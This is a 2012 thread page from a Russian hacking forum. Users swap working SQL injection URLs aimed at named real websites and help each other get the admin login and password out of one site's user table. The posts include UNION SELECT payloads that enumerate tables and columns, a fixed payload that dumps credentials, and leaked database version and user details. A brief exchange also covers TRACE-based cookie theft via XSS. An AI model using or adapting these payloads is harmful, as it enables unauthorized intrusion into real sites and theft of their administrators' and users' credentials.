HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21211  
Старый 16.08.2012, 16:33
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию

Цитата:
Сообщение от MaxFast  
Потому-что это слепая скуля
Вы не правы
 
Ответить с цитированием

  #21212  
Старый 16.08.2012, 18:02
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от InDuStRieS  
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит
блиндом выводится

5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
 
Ответить с цитированием

  #21213  
Старый 16.08.2012, 18:22
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами: 9030789

Репутация: 704
По умолчанию

Цитата:
Сообщение от er9j6@  
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
Не со всем понятно,там же мускл ошибка выводиться..

В любом случае чтобы тут не флудить,просьба отписать в личку или в аську 564714

Готов финансово вознаградить,нужно обьяснить как ты вывел
 
Ответить с цитированием

  #21214  
Старый 16.08.2012, 18:44
Dad69
Новичок
Регистрация: 16.10.2011
Сообщений: 11
С нами: 7670486

Репутация: 0
По умолчанию

Подскажите актуальные методы trace
 
Ответить с цитированием

  #21215  
Старый 16.08.2012, 21:01
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Dad69  
Подскажите актуальные методы trace
Эмм. Что ? Очередная порция хеккеров с Acunetix ?

Описание. Пункт 9.8

Применение в XSS
 
Ответить с цитированием

  #21216  
Старый 17.08.2012, 19:02
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Dad69

Этот метод тебе ничего не даст, потому что сложно заставить браузер жертвы отослать запрос TRACE, он используется если в двух словах просто для отражения запроса обратно к клиенту, т.е. теоретически если бы ты смог заставить жертву отослать такой запрос, сервер вернул бы эту информацию назад, например куки жертвы.

Но не знаю на сегодняшний день позволяет ли хоть один браузер такое делать. Вот если бы там был рабочий метод PUT ))

Собственно BigBear дал ссылки на описание.
 
Ответить с цитированием

  #21217  
Старый 17.08.2012, 21:10
sobvit
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами: 7232726

Репутация: 0
По умолчанию

Подскажите, плиз, подобрал колонки, хочу вывести логин и пасс админа, но не получается.

Для таблиц

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,table_name,3%20from%20informati on_schema.tables%20limit%2044,1%20--
Для колонок

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,group_concat%28column_name%29,3 +from+information_schema.columns+where+table_name= 0x75736572--
Для вывода админа

Цитата:
Сообщение от None  
www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws(username,password),3 from+user+limit+1,1 --
Почему данные админа не выводятся?
 
Ответить с цитированием

  #21218  
Старый 17.08.2012, 21:23
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от sobvit  
Почему данные админа не выводятся?
Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws%280x3a,username,passw ord%29,3%20from+crt_main.user+limit+0,1--
.....
 
Ответить с цитированием

  #21219  
Старый 17.08.2012, 21:36
sobvit
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами: 7232726

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
.....
А почему надо использовать такую конструкцию записи (crt_main.user) ?
 
Ответить с цитированием

  #21220  
Старый 17.08.2012, 21:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от sobvit  
А почему надо использовать такую конструкцию записи (crt_main.user) ?
потому что таблица в другой базе, читайте учебники , дальше буду удалять
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.